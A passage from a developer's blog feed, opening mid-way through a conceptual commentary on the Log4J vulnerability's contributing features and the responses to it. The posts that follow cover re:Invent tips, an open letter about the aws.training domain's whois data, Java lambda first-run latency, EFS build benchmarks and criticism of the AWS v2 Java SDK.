<p> Having done that, and reading as much as I could on the issue (the <a href="https://www.lunasec.io/docs/blog/log4j-zero-day/" target="_blank">LunaSec</a> writeups are excellent), I've decided to voice my own thoughts on the matter. Some of which I haven't seen other people say, so they may be similarly interesting to you.
<p> First, I think that it's important to recognize that this vulnerability — like most things that end up in the news — is not the result of a single issue. Instead, it's a combination of features, some of which make perfect sense:
<ol>
<li> <strong> Log4J 2.x provides string interpolation for configuration (aka
“<a href="https://logging.apache.org/log4j/2.x/manual/lookups.html" target="_blank">lookups</a>”) </strong>
<p>
This is a great idea; I implemented it for my own logging library. The idea is that you don't want your configuration files to contain hardcoded values, such as the address of your central syslog daemon (or, in my case, the name of a CloudWatch log group). Log4J 2.x provides a long list of lookups, ranging from environment variables to information from the Docker container running your application.
<li> <strong> One of the lookups retrieves data from the Java Naming and Directory Interface (JNDI) API </strong>
<p>
In large deployments, it's nice to be able to centralize your configuration. There are lots of tools to do this, but Java Enterprise Edition settled on JNDI, also known as the <code>javax.naming</code> package. JNDI is an umbrella API for retrieving data from different sources, such as LDAP.
<li> <strong> <code><a href="https://docs.oracle.com/javase/8/docs/api/javax/naming/spi/ObjectFactory.html" target="_blank">javax.naming.spi.ObjectFactory</a></code> supports loading code from a remote server </strong>
<p>
This is a somewhat dubious idea, but the <a href="https://docs.oracle.com/javase/8/docs/technotes/guides/jndi/spec/spi/jndispi.fm.html#a1007760" target="_blank">JNDI SPI (service provider interface) spec</a> justifies it: it lets you defined resources (such as printer drivers) that can be retrieved directly from JNDI. They use the example of a printer driver, and it should be a familiar example to anyone who has installed a printer on their home computer (do you know that the driver you installed is trustworthy?).
<p>
Note: this condition is necessary for remote-code execution, but <em>not</em> for data exfiltration.
<li> <strong> The Log4J 2.x <code>PatternLayout</code> also supports string interpolation, with the same set of lookups </strong>
<p>
Here we're getting into questionable features in the library. I had no idea that this behavior existed, even though I dug deeply into the documentation and source code when implementing my appenders. The <a href="https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout" target="_blank">documentation</a> for this layout class is quite long, and prior to the vulnerability, you had to infer the behavior based on the presence of the <code>nolookups</code> pattern option.
<li> <strong> Users log unsanitized data </strong>
<p>
If users passed all of their logging messages through a sanitizer that looked for and removed the sequence <code>${</code>, then the vulnerability wouldn't exist. Except nobody does that, because why would you have to? I call it out because I think it's important to consider what you're logging, and whether it might contain information that you don't want to log. As I say in my “effective logging” talk, passwords can hide in the darndest places.
</ol>
<p> These are the things that need to happen to make this vulnerability affect you. If you can prevent one of them from happening, you're not vulnerable … to this specific issue. And there <em>are</em> ways to do this, although they aren't things that you can easily implement once the vulnerability is discovered. I'm writing a separate post on how Cloud deployments can mitigate similar vulnerabilities.
<p> For now, however, I want to focus on two of the responses that I saw online: pay for open-source maintainers, and inspecting code before using it. In my opinion, neither of these are valid, and they distract from preparing for the <em>next</em> serious vulnerability.
<h2> Response #1: inspect code before you use it. </h2>
<p> For any non-trivial application, this is simply impossible.
<p> The current “trunk” revision of <code>log4j-core</code> has 89,778 lines of code, excluding test classes (measured using <code>find</code> and <code>wc</code>). That doesn't count any add-on libraries that you might use to write to your preferred destination, such as my <a href="https://github.com/kdgregory/log4j-aws-appenders" target="_blank">log4j-aws-appenders</a> (which has over 10,000 lines of mainline code). And logging is a tiny part of a modern application, which is typically built using a framework such as Spring, and runs on an application server such as Tomcat or Jetty.
<p> And even if your company is willing to pay for the staff to read all of that source code, what is the chance that they will discover a vulnerability? What is the chance that they will even learn all of its behaviors? I've spent quite a bit of time with the Log4J 2.x code and documentation, both to write my library and on <a href="https://www.kdgregory.com/index.php?page=logging.log4j2Plugins" target="_blank">a post describing how to write Log4J plugins</a>, and I never realized that it applied string interpolation to the raw log messages. After I knew about the vulnerability, of course, it was easy to find the code responsible.
<h2> Response #2: we — or at least large companies — should be paying the maintainers of open-source projects. </h2>
<p> I don't know the situation of the core Log4J developers, and whether or not they get paid for their work on the project. But I don't believe that this vulnerability was the result of an overworked, unpaid, solo developer. True, there was no discussion on the <a href="https://issues.apache.org/jira/browse/LOG4J2-313" target="_blank">commit that introduced JNDI lookups</a> (ignoring the tacky post-hoc commenters). But the code that applies string substitution to logging events has been in the library since the 2.0 release, and has been rewritten multiple times since then.
<p> In fact, I think direct corporate sponsorship would lead to <em>more</em> unexpected behavior, because the sponsoring corporations will all have their own desires, and an expectation that those desires will be met. And if my experience in the corporate world is any guide, a developer that feels their paycheck is in jeopardy is much more likely to do something without giving it full thought.
<h2> So where does that leave us? </h2>
<p> Unfortunately, I haven't seen very many practical responses (although, as I said, I'm writing a separate post to this effect). And I think that the reason for that is that the real answer puts the onus for vulnerabilities on us, the consumers of open-source software.
<p> <a href="https://en.wikipedia.org/wiki/Linus%27s_law" target="_blank">Linus's Law</a>, coined by Eric S Raymond, is that “given enough eyeballs, all bugs are shallow.” And this played out in full view with this vulnerability: the Log4J team quickly found and patched the problem, and has been releasing additional patches since.<a href="footnote2">²</a> There have also been multiple third-parties that have written detailed evaluations of the vulnerability.<a href="footnote2">³</a>
<p> But still, we, the consumers of this package, needed to update our builds to use the latest version. And then deploy those updated builds. If you didn't already have a process that allows you to quickly build and deploy a hotfix, then your weekend was shot. Even if you did get a hotfix out, you needed to spend time evaluating your systems to ensure that they weren't compromised (and beware that the most likely compromise was exfiltration of secrets!).
<p> It's natural, in such circumstances, to feel resentment, and to look for external change to make such problems go away. Or maybe even to think about reducing your reliance on open-source projects. <p> But in my opinion, this is the wrong outcome. Instead, look at this event as a wake-up call to make your systems more robust. Be prepared to do a hotfix at a moment's notice. Utilize tools such as web application firewalls, which can be quickly updated to block malicious traffic. And improve your forensic logging, so that you can identify the effects of vulnerabilities after they appear (just don't log unsanitized input!).
<p> Because this is not the last vulnerability that you will see.
<hr/>
<p> <a name="footnote1">1</a>:
You might be interested to learn that the Apache Software Foundation receives approximately $3 million a year (annual reports <a href="https://www.apache.org/foundation/reports.html" target="_blank">here</a>). However, to the best of my knowledge, they do not pay stipends to core maintainers. I do not know how the core Log4J 2.x maintainers earn their living.
<p> <a name="footnote2">2</a>:
<a href="https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.0" target="_blank">Log4J 2.x change report</a>.
<p> <a name="footnote3">3</a>:
I particularly like the CloudFlare posts, especially the one that <a href="https://blog.cloudflare.com/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/" target="_blank">describes how attackers changed their payloads to avoid simple firewall rules</a>. This post informed my belief that the goal of most attacks was to exfiltrate secrets rather than take over systems.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-9921414478566610582021-07-14T08:28:00.006-04:002021-07-14T08:40:00.813-04:00My take on "How to re:Invent"<p> It's back. AWS is taking over Las Vegas for a week filled with information, sales pitches, and corporate-friendly activities. And while COVID and the possibility of a “fourth wave” hang over the conference, I decided to sign up. Having been to re:Invent once, I now consider myself an expert on how to survive the week. Here are five of my suggestions.
<dl>
<dt> <b> #1: Wear comfortable shoes. </b>
<dd> OK, everybody says this, but it bears repeating: you're going to do a lot of walking. It might take ten minutes to navigate from the front door of a hotel to the meeting rooms, following a labyrinthine path through the casino. To give you some numbers: my watch recorded 87,000 steps, or 44.6 miles, over the five days of the conference. That may be higher than average: I often walked between venues rather than find my way to the shuttle buses. But even if you “only” walk 30 miles, you'll still be thankful for doing it in a pair of running shoes.
<dt> <b> #2: Stay in a “venue” hotel. </b>
<dd> These are the hotels that host sessions and other sponsored content, as opposed to the “sleeping” hotels that just have rooms for attendees. There are several reasons to stay at a venue hotel, but in my opinion the most important is that it cuts down on the amount of walking that you have to do. Of my 87,000 steps, I estimate that 10,000 or more were taken up in walking from my room at the Park MGM to the Aria so that I could pick up a shuttle bus.
<dt> <b> #3: Attend workshops, not sessions. </b>
<dd> There are some great sessions at re:Invent, conducted by people who are intimately familiar with the service. If you have specific questions it's worth attending one of the “deep dives” and then walking up to the speaker afterward to ask those questions.
<p> <em>But,</em> all of these sessions will be recorded, and you can watch them at your leisure. So if you don't have specific questions there's no reason to attend in-person. What you <em>can't</em> do after December 3rd is learn with an AWS instructor by your side (well, not for free anyway). Unfortunately, space for these workshops is limited, so sign up early for the ones you want (that said, scheduling at re:Invent is <em>extremely</em> fluid; at least half the sessions I attended were marked as full but then had spots open up an hour before they started).
<dt> <b> #4: Fly out on Saturday. </b>
<dd> If you're not from the United States, you may not realize that re:Invent takes place during the week after the Thanksgiving holiday. Thanksgiving is a time when people return home to visit family and friends, and then all of them get on a plane the following Sunday to return home. It's historically the busiest travel day of the year, and US airports are crowded and frantic with people who only fly on that weekend. Plus, airlines charge the highest rates of the year, because they know people will pay. Even if you have TSA/Pre, it's not fun.
<p> If you're willing to fly out a day early, you avoid the crowds. Plus, you can save significantly on the airfare (right now, it would save me over $300, or nearly 50%). Against that, you'll be paying for an extra night in Vegas. For me, with the conference rate for the hotel, the numbers worked.
<dt> <b> #5: Get out of Vegas. </b>
<dd> For some people, Vegas is a destination: they love the lights, the noise, and the constant activity. For me, it's overwhelming. Fortunately, you can find thousands of square miles of absolute desolation just outside city limits.
<p> Last time, I rented a motorcycle for a day and explored nearby attractions: <a href="http://parks.nv.gov/parks/valley-of-fire" target="_blank">Valley of Fire</a>, <a href="https://www.usbr.gov/lc/hooverdam/" target="_blank">Hoover Dam</a>, and <a href="https://www.blm.gov/programs/national-conservation-lands/nevada/red-rock-canyon" target="_blank">Red Rock Canyon</a>. This year, I'm planning to take three days and explore southern Utah and northern Arizona. If you're not a motorcyclist, Vegas also has plenty of rental cars, including exotics. And at the far end of the scale, you can spend a day in a high-performance driving class at the Las Vegas Motor Speedway.
</dl>
<p> Well, that's it. Now it's time to cross my fingers and hope the US COVID situation remains under control.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-29843110560230338502021-06-08T08:05:00.002-04:002021-06-08T08:30:10.945-04:00An open letter to the AWS Training organization<p> You don't have a Feedback link on your site, but it seems that Amazon keeps close tabs on the Blogosphere, so hopefully this reaches you.
<p> I don't know whether you're an actual sub-division of Amazon, but the website URL https://www.aws.training certainly didn't give me a warm fuzzy feeling when it came up in Google. In fact, my first thought was that it was some unaffiliated company that had better SEO.
<p> So, since it was asking me for login credentials, I did what any reasonably cautious technologist would do, and ran <code>whois</code>. And this is what I got back:
<pre class="codeSample">
Domain Name: aws.training
Registry Domain ID: 8d519b3def254d2f980a08f62416a5b9-DONUTS
Registrar WHOIS Server: whois.comlaude.com
Registrar URL: http://www.comlaude.com
Updated Date: 2019-05-19T19:54:24Z
Creation Date: 2014-03-19T00:32:11Z
Registry Expiry Date: 2024-03-19T00:32:11Z
Registrar: Nom-iq Ltd. dba COM LAUDE
Registrar IANA ID: 470
Registrar Abuse Contact Email: abuse@comlaude.com
Registrar Abuse Contact Phone: +44.2074218250
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Amazon Technologies, Inc.
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: NV
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
</pre>
<p> That's the sort of whois entry that you get for an individual using a shared hosting service. In fact, it provides less information than you'll see with my domain, which runs on a shared hosting service, and I pay extra for privacy.
<p> By comparison, the whois entry for Amazon itself looks like this (and note that it's a different registrar, another red flag):
<pre class="codeSample">
Domain Name: amazon.com
Registry Domain ID: 281209_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2019-08-26T12:19:56-0700
Creation Date: 1994-10-31T21:00:00-0800
Registrar Registration Expiration Date: 2024-10-30T00:00:00-0700
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2083895770
Registrant Name: Hostmaster, Amazon Legal Dept.
Registrant Organization: Amazon Technologies, Inc.
Registrant Street: P.O. Box 8102
Registrant City: Reno
Registrant State/Province: NV
Registrant Postal Code: 89507
Registrant Country: US
Registrant Phone: +1.2062664064
Registrant Phone Ext:
Registrant Fax: +1.2062667010
Registrant Fax Ext:
Registrant Email: hostmaster@amazon.com
</pre>
<p> While I'm a little surprised by the Reno address, rather than Seattle, this at least looks like the sort of registration information used by a business rather than somebody who pays $10/month for hosting.
<p> I ended up getting to the training site via a link on the AWS Console, so was able to achieve my goal.
<p> But I think there's a general lesson: don't forsake your brand without good reason.
<p> And at the very least, ask your network administrators to update your whois data.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-64024262089732627432021-02-26T08:00:00.000-05:002021-02-26T08:00:40.573-05:00Java8 Lambda Startup Times<p> A few months ago <a href="https://blog.kdgregory.com/2020/12/diving-into-first-run-times-for-lambdas.html" target="_blank">I wrote a post</a> about startup times of AWS Lambdas written in Java. This post has a similar title, but a different topic: it looks at the first-run time for lambdas (lowercase) in a Java program, and has nothing to do with AWS. Although I did discover this issue while writing code for AWS. Confused yet?
<p> <a href="https://docs.oracle.com/javase/tutorial/java/javaOO/lambdaexpressions.html" target="_blank">Lambda expressions</a> were added to the Java language with the release of Java 8 in 2014. By now I'm assuming every Java programmer has used them, if only as arguments to higher-order functions in the <code>java.util.stream</code> package:
<pre class="codeSample">
List<String> uppercasedNames = names.stream()
.map(s -> s.toUpperCase())
.collect(Collectors.toList());
</pre>
<p> You can implement your own higher-order functions, with parameter types from the <code>java.util.function</code> package (or, if you have more complex needs, defining your own <a href="https://docs.oracle.com/javase/specs/jls/se8/html/jls-9.html#jls-9.8" target="_blank">functional interfaces</a>). So, for example, you might have a function with this signature:
<pre class="codeSample">
public static String retryLambda(long interval, long timeout, Supplier<String> lambda) throws Exception
</pre>
<p> This can be called with any lambda expression that doesn't take arguments and returns a string. For example:
<pre class="codeSample">
retryLambda(50, 100, () -> Instant.now().toString());
</pre>
<p> As you might have guessed from the signature, this function retries some operation. But before I dig into the implementation, here's some background about why you'd implement such a function. Most of my recent posts have referenced my <a href="https://github.com/kdgregory/log4j-aws-appenders" target="_blank">AWS logging library</a>, and this one's no different. When working with AWS, you need to be prepared to retry operations: either because AWS throttled the request (returning an error that indicates you should retry after a short delay), or because operations are eventually-consistent (there's a delay between creating something and being able to use it). As a result, AWS code can include a lot of retry loops:<a href="#footnote1">*</a>
<pre class="codeSample">
long timeoutAt = System.currentTimeMillis() + timeout;
while (System.currentTimeMillis() < timeoutAt)
{
String value = doSomething();
if (value != null)
return value;
Thread.sleep(interval);
}
throw new RuntimeException("timeout expired");
</pre>
<p> That's seven lines of boilerplate wrapping one line that actually does something. Functional programming is all about getting rid of boilerplate, so I implemented a function that would accept a lambda:<a href="#footnote2">**</a>
<pre class="codeSample">
public static String retryLambda(long interval, long timeout, Supplier<String> lambda) throws Exception
{
long timeoutAt = System.currentTimeMillis() + timeout;
while (System.currentTimeMillis() < timeoutAt)
{
String value = lambda.get();
if (value != null)
return value;
Thread.sleep(interval);
}
throw new RuntimeException("timeout expired");
}
</pre>
<p> The hardcoded loops can now be replaced with a call to this function:
<pre class="codeSample">
retryLambda(50, 250, () -> doSomething());
</pre>
<p> All well and good, and it reduced the size of the code, but then my tests started failing.
<p> When you're actually talking to AWS, you might need a timeout of 30 seconds or more. But you definitely don't want such a long timeout in a unit test. To solve that problem, I replaced the <code>interval</code> and <code>timeout</code> arguments with much shorter values: 50 and 200 milliseconds. And then my tests would assert the number of times the function was called: based on those values, the operation should be attempted four times before timing out. However, I was seeing that they were only executed two or three times.
<p> When I dug into the problem, what I discovered is that the first execution of a lambda takes 40 to 50 <em>milliseconds</em> on my Core i7-3770K running Oracle Java 1.8.0_271. I knew there was a lot happening behind the scenes to make lambdas work, but wow, that's nearly infinity!
<p> I also ran on an EC2 <code>m5a.xlarge</code> instance running AWS Linux 2, and saw that it took over 70 milliseconds with OpenJDK 1.8.0_272, but only 18 milliseconds running Corretto 11.0.10.9.1. I have to assume that the performance improvement is similar across Java11 implementations, but haven't tested. If you'd like to try it out yourself, I've created <a href="https://gist.github.com/kdgregory/7d75e4aa6696caa7eaea2b0b77643542" target="_blank">a GitHub Gist</a> with the test program.
<p> One thing that I do <em>not</em> want you to take from this post is the idea that Java lambdas are bad, or are poorly implemented. I didn't delve too deeply into what happens during that first invocation, but suspect that the JVM is loading something from disk (much like the initial JVM startup time). And in my experiments, invoking additional, different lambdas did not add to the execution time. So, like anything Java, lambdas are best used in a long-running program.
<p> However, if you are in a similar situation, testing timing-dependent code that utilizes lambdas, you need to be prepared. When I ran into the problem, I simply wanted to move on with my life and relaxed the assertions (the primary assertion was elapsed time, which didn't change; it was simply the number of invocations). Now, after thinking about the problem and writing the example program for this post, I think I'd use a <code>@BeforeClass</code> function to “warm up” the lambda mechanism.
<hr/>
<p> <a name="footnote1">*</a>
Not all AWS code needs to have retry loops. But, for example, if you create a Kinesis stream you will need to wait until it becomes active before writing to it. I've seen some mock implementations of AWS services that don't accurately reflect these delays, leading to code that fails in the real world.
<p> <a name="footnote2">*</a>
Actually, I implemented <a href="https://github.com/kdgregory/log4j-aws-appenders/blob/trunk/library/logwriters/src/main/java/com/kdgregory/logging/common/util/RetryManager.java" target="_blank">a class</a>, which was far easier to replace during testing. For an example if its use, <a href="https://github.com/kdgregory/log4j-aws-appenders/blob/trunk/library/logwriters/src/main/java/com/kdgregory/logging/aws/cloudwatch/CloudWatchLogWriter.java#L202" target="_blank">look here</a>.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-32377406781770573902021-02-16T07:35:00.003-05:002021-02-17T07:54:44.954-05:00EFS Build Performance Revisited<p> A few years ago I <a href="https://blog.kdgregory.com/2018/08/poor-efs-performance-for-software-builds.html" target="_blank">wrote a post</a> calling out the poor performance of Amazon's Elastic File System (EFS) when used as the working directory for a software build. Since then, EFS has seen <a href="https://docs.aws.amazon.com/efs/latest/ug/document-history.html" target="_blank">many performance improvements</a>. Is it now viable for purposes such as developer home directories or build machines?
<p> <strong>TL;DR: no.</strong>
<p> As before, I'm using an <code>m5d.xlarge</code> EC2 instance running AWS Linux 2 as my testbed (for the record, <code>ami-03c5cc3d1425c6d34</code> — you'll see later why I want to remember this). It provides four virtual CPUs and 16GB of RAM, so hardware should not be an issue. My test builds are the AWS SDK and my logging appenders project (releasing the latter is why I spun up the instance in the first place). The appenders project is larger than it was last time, but is still a reasonable “small” project. For consistency, I'm using the same tag (<code>1.11.394</code>) for the AWS SDK; it's grown dramatically in the interim.
<p> I've configured the build machine with three users, each of which has their home directory in one of the tested storage types (instance store, EBS, EFS). The EBS test uses a 100 GB <code>gp2</code> volume that is dedicated to the build user. For the EFS test I created two volumes, to compare the different EFS <a href="https://docs.aws.amazon.com/efs/latest/ug/performance.html#performancemodes" target="_blank">performance modes</a>.
<p> For each build I took the following steps:
<ol>
<li> Copy the project from a "reference" user. This user has project directories without the <code>.git</code> directory, along with a fully-populated Maven local repository.
<li> Perform a test build. This is intended to ensure that all dependencies have been downloaded, and that there is nothing that would cause the build to fail.
<li> Run <code>mvn clean</code> in the test directory.
<li> Flush the disk cache (<code>sync</code>).
<li> For instance store, run TRIM (<code>fstrim -v /</code>) to avoid the penalty of SSD write amplification.
<li> Clear the in-memory buffer cache (<code>echo 3 > /proc/sys/vm/drop_caches</code>)
<li> Run the timed build (<code>time mvn compile</code>).
</ol>
<p> And here's the results. As before, I show the output from the <code>time</code> command: the first number is the "real" time (the wall-clock time it took to build). The second is "user" (CPU) time, while the third is "system" (kernel operation) time. All times are minutes:seconds, and are rounded to the nearest second.
<table>
<tr> <th> </th>
<th colspan="3"> Appenders </th>
<th colspan="3"> AWS SDK </th>
</tr>
<tr> <th> </th>
<th> Real </th>
<th> User </th>
<th> System </th>
<th> Real </th>
<th> User </th>
<th> System </th>
</tr>
<tr> <th align="left" style="padding-right: 1em;"> Instance Store </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:05 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:13 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:00 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 01:14 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 02:16 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:06 </td>
</tr>
<tr> <th align="left" style="padding-right: 1em;"> EBS </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:06 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:15 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:00 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 01:26 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 02:13 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:06 </td>
</tr>
<tr> <th align="left" style="padding-right: 1em;"> EFS General Purpose </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:23 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:20 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:01 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 15:29 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 02:22 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:15 </td>
</tr>
<tr> <th align="left" style="padding-right: 1em;"> EFS Max IO </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:55 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:18 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:01 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 36:24 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 02:28 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:15 </td>
</tr>
</table>
<p> Comparing these timings to my previous run, the first thing that jumped out at me was how wildly different reported “user” time is. In fact, they are so different that my first step was to fire up an EC2 instance using the same AMI as the previous test (thankfully, AWS doesn't delete <em>anything</em>), and confirm the numbers (and yes, they were consistent). Intuitively, it should take the same amount of CPU time to compile a project, regardless of the performance of the disk storage, so I'm not sure why I didn't do more digging when I saw the original numbers. Regardless, “real” time tells the story.
<p> And that story is that EFS still takes significantly longer than other options.
<p> There have been definite performance improvements: the “general purpose” EFS volume takes 15 minutes, versus the 30+ required by the earlier test (the close correspondence of the earlier test and the “MAX IO” volume type make me think that it might be the same implementation).
<p> But if you're speccing a build machine — or anything else that needs to work with large numbers of relatively small files — EFS remains a poor choice.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-11803145386891675042021-02-01T07:56:00.006-05:002024-01-24T09:12:55.046-05:00Why I Won't Use The AWS V2 Java SDK<p> <b> Update, 2024-01-24 </b>
<p> Well, I was wrong: <a href="https://aws.amazon.com/blogs/developer/announcing-end-of-support-for-aws-sdk-for-java-v1-x-on-december-31-2025/"
target="_blank">AWS is end-of-lifing the v1 SDK</a>. They will stop adding new features in July
of this year, and stop providing updates in December 2025. They just announced this plan, so
I'm still waiting to see if they'll back-pedal under pressure from large customers. But until
that happens, ignore my advice below and start converting your code.
<p> That said, feel free to read my venting from three years ago ...
<p> Amazon's "version 2" SDK for Java was first released three and a half years ago. As of this
writing, the current version is 2.15.73. So it's time to upgrade your Java AWS projects, right?
<p> To which my answer is a resounding “NO!” In fact, if you are starting a <em>new</em>
java AWS project, I recommend that you stick with the version 1 SDK unless you have a
<em>compelling</em> reason to change. Especially if you already have code that uses version 1.
<p> I base these statements on my experience updating my <a href="https://github.com/kdgregory/log4j-aws-appenders" target="_blank">logging library</a>.
While this library doesn't use a lot of AWS services, it goes deep on the ones that it does
use, especially client configuration. For additional context, I've been using the version 1
Java SDK since it came out, I currently use the Python SDK very heavily, and I've also spent
some time with the JavaScript and Ruby SDKs. Plus, I implemented
<a href="https://sourceforge.net/projects/s34j/" target="_blank">my own S3 SDK</a>
before the Java SDK was available. In other words, I'm not just someone who spent an hour
trying to work with the library, got fed up, and is now venting.
<p> And before I do start venting, I want to call out the things that I <em>do</em> like about
the new library:
<dl>
<dt> <b> Consistent Naming </b>
<dd> This is big. It's not just a matter of getting rid of the superfluous “Amazon”
or ”AWS” prefix, but of consistent categorization. For example, CloudWatch
Logs: that's its name, you find its documentation next to other things named CloudWatch,
and you look at your logs by going to the CloudWatch page in the console. Yet in the v1
SDK it's called <code>AWSLogs</code>, and the JAR is <code>aws-java-sdk-logs</code>. A
small thing, but small things are what enhance or detract from developer productivity.
<dt> <b> Paginators </b>
<dd> Paginated requests are a Good Thing: not only do they reduce the load on Amazon's
servers, they avoid blowing up client programs (eg, downloading a gigabyte of data
due to a poorly configured <code>FilterLogEvents</code> call). But dealing with pagination
is a developer tax: the same dozen or so lines of code every time you make a paginated
request (in fact, that was one of the primary drivers of my been-on-hold-because-I-mostly-work-with-Python-these-days
<a href="https://github.com/kdgregory/aws-java-utils" target="_blank">AWS utility library</a>).
It's a lot easier to request a paginator and then loop through results or process them
with a Java8 stream. I especially like that Java paginators don't force you to deal with
<em>pages</em> at all, unlike the Python paginators.
</dl>
<p> And … that's about it. Now onto the things that I <em>don't</em> like:
<dl>
<dt> <b> Wholesale name changes of getters and setters </b>
<dd> I understand why they did it: everybody hates Java's “bean” naming
conventions. The <code>get</code>, <code>set</code>, and <code>with</code> prefixes
are just visual clutter. All of the other SDKs use “property” naming,
so why not make the Java SDK consistent? But the result, if you're planning to upgrade
an existing project, means hours — perhaps days — of tedious manual
effort to get rid of those prefixes. And at the same time, you'll be converting
all of your code to use builders rather than constructors.
<dt> <b> Just when you get used to the new conventions, you find a client that doesn't follow them </b>
<dd> In my case, it was discovering that <code>KinesisClient</code> didn't support
paginators, so I found myself re-implementing that dozen lines of code to iterate
the list of streams. I also discovered that <code>IamClient</code> doesn't provide
<code>create()</code>, unlike the other clients, but that brings up a bigger issue.
<dt> <b> The documentation is incomplete and at times misleading </b>
<dd> <code>IamClient</code> doesn't implement the <code>create()</code> method. That
seems like an oversight, until you use <code>IamClient.builder().build()</code>
and get an <code>UnknownHostException</code> with a long and confusing chain of
causes. To get a usable client, you must add <code>.region(Region.AWS_GLOBAL)</code>
to the builder invocation.
<p>
There is no hint of this in the <code>IamClient</code> documentation. The only
AWS documentation that has anything to say on the topic is the
<a href="https://docs.aws.amazon.com/sdk-for-java/latest/migration-guide/client-region.html" target="_blank">Migration Guide</a>,
in which you'll see “Some AWS services don't have Region specific endpoints.”
But no list of the classes affected, or examples of client configuration code. Oh,
and sorry to amybody in China who might want to use my library: you've got a
different region name.
<p>
That covers “incomplete.” For “misleading,” take a look at
<code>StsAssumeRoleCredentialsProvider</code>. The version 1 variant of this class
requires an STS client, which it uses to periodically refresh the credentials. For
<a href="https://sdk.amazonaws.com/java/api/latest/software/amazon/awssdk/services/sts/auth/StsAssumeRoleCredentialsProvider.Builder.html" target="_blank">version 2</a>,
there's no indication that this method exists — moreover, the JavaDoc claims
that the builder class extends <code>Object</code>, which should mean that the documented
methods are all that exist. You have to look at
<a href="https://github.com/aws/aws-sdk-java-v2/blob/master/services/sts/src/main/java/software/amazon/awssdk/services/sts/auth/StsAssumeRoleCredentialsProvider.java#L82" target="_blank">the source code</a>
to see that it actually extends a <code>BaseBuilder</code> class (and has since the
developer preview was released).
<p>
I think that the core problem in both cases is that perhaps 99.9% of everything in
the SDK is generated from one central API specification. This is really the only way
that you can manage multiple SDKs for over 100 services, each of which exposes dozens
of operations. However, that 0.1% (or less) is what gives each SDK its personality,
and it seems that the documentation generators for the v2 Java SDK aren't keeping
up with the custom pieces. Fortunately, there's Google and Stack Overflow.
<dt> <b> There are still missing capabilities </b>
<dd> According to <a href="https://docs.aws.amazon.com/sdk-for-java/latest/migration-guide/whats-different.html"
target="_blank">the migration guide</a>, “higher level” libraries like
the S3 Transfer Manager aren't available; if you need them you'll need to use
<em>both</em> the V1 and V2 SDKs. I haven't verified this myself, but in the past
I've used the Transfer Manager very heavily and have recommended it to others.
</dl>
<p> So what would be a compelling reason to switch? The only one I can think of is the
ability to use HTTP/2 and true asynchronous clients. Both can improve performance when
you're making large numbers of concurrent API calls. Of course, there are often better
alternatives to making large numbers of API calls, especially calls that run the risk
of being throttled (and a bonus complaint about AWS APIs in general: they have many
different ways to report throttling).
<p> One thing that is <em>not</em> compelling is the fear that one day AWS will decide to
discontinue the version 1 SDK. First, because AWS never seems to deprecate/remove
anything (does anyone still use SimpleDB? how about the Simple Workflow Service?).
But more important is the existing code that uses version 1. I don't know how many
millions of lines there are, but I suspect that it's large. And I also suspect that
most of it belongs to companies that pay Amazon lots of money and would seriously
reconsider cloud providers if required to update their codebases.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-52122017543322520952020-12-28T07:28:00.000-05:002020-12-28T07:28:05.629-05:00Diving Into First-Run Times for Lambdas Written in Java<p> A few weeks ago I <a href="https://stackoverflow.com/a/65160907" target="_blank">answered a Stack Overflow question</a> about the poor performance of Java Lambdas. I gave some general suggestions, but didn't provide any data to back them up. This post is my data.
